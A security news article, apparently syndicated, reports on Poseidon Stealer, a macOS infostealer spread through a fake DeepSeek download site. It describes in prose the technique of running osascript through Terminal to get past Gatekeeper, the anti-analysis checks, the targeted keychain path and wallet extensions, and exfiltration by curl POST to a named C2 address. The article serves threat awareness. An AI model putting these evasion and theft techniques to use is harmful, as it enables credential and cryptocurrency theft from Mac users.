This malware-as-a-service (MaaS) operation employs advanced social engineering tactics combined with anti-analysis techniques to compromise sensitive user data, marking a significant escalation in macOS-targeted threats.
The attack chain begins with malvertising campaigns redirecting users to deepseek.exploreio[.]net, a domain hosting a near-perfect replica of the legitimate DeepSeek AI interface.
Upon clicking “Download for Mac OS,” victims receive a DMG file named DeepSeek_v.[0-9].[0-9]{02}.dmg from the compromised domain manyanshe[.]com.
The mounted DMG contains a malicious shell script masquerading as an application bundle:
This multi-stage payload leverages osascript to execute AppleScript commands that bypass macOS Gatekeeper protections by forcing execution through Terminal.
The script copies a binary named .DeepSeek to /tmp, clears extended attributes with xattr -c, and marks it executable via chmod +x.
Anti-Analysis and Evasion Techniques
Poseidon Stealer implements layered anti-debugging measures, a secondary check uses sysctl to inspect the P_TRACED flag in process status.
The malware terminates if usernames match common researcher aliases like “maria” or “jackiemac” through AppleScript validation.
Post-execution, it runs disown; pkill Terminal to detach from the parent process and remove forensic artifacts.
Data Exfiltration Mechanisms
Poseidon harvests:
- Chromium/Firefox credentials (cookies, passwords, credit cards)
- Cryptocurrency wallet data from 127 targeted extensions including MetaMask (nkbihfbeogaeaoehlefnkodbefgpgknn) and Coinbase Wallet (hnfanknocfeofbddgcijnmhnfnkdnaad)
- System keychain databases (/Library/Keychains/login.keychain-db)
- Documents matching *.txt, *.pdf, *.wallet extensions
According to the Report, A forged password dialog validates credentials before zipping stolen data. Exfiltration occurs via curl POST requests to the C2 at 82.115.223[.]9/contact.
Mitigation Strategies
eSentire’s TRU team recommends:
- Restricting osascript execution through MDM policies
- Implementing NGAV solutions to detect and contain threats
- User education on Terminal-based execution risks
This campaign demonstrates attackers’ growing sophistication in bypassing macOS security controls.
The combination of social engineering, multi-stage payloads, and extensive data harvesting capabilities positions Poseidon Stealer as a critical threat to organizational and individual macOS users alike.
eSentire confirms active containment of infections across multiple enterprise networks, with ongoing monitoring for related IoCs.
Free Webinar: Better SOC with Interactive Malware Sandbox for Incident Response and Threat Hunting – Register Here
The post Poseidon Stealer Malware Attacking Mac Users via Fake DeepSeek Site appeared first on Cyber Security News.
Discover more from RSS Feeds Cloud
Subscribe to get the latest posts sent to your email.
